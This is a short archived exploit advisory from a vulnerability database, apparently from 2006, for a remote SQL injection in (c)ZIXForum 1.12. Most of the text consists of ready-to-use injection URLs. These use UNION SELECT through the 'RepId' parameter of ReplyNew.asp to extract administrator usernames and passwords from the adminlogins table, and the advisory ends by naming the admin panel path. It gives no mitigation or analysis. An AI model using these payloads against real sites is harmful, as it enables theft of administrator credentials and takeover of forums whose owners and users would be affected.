Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14154
HistorySep 06, 2006 - 12:00 a.m.

(c)ZIXForum 1.12 <= "RepId" Remote SQL Injection

2006-09-0600:00:00
vulners.com
16

################################################################################

(c)ZIXForum 1.12 <= "RepId" Remote SQL Injection

     ##

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Credit by | Chironex Fleckeri

Mail | [email protected]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

################################################################################

##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION
SELECT null,null,null,J_user,null,null,null,null,null,null,null,null
FROM adminlogins #
##########################################################################################################################################################

##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION
SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null
FROM adminlogins #
##########################################################################################################################################################

################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################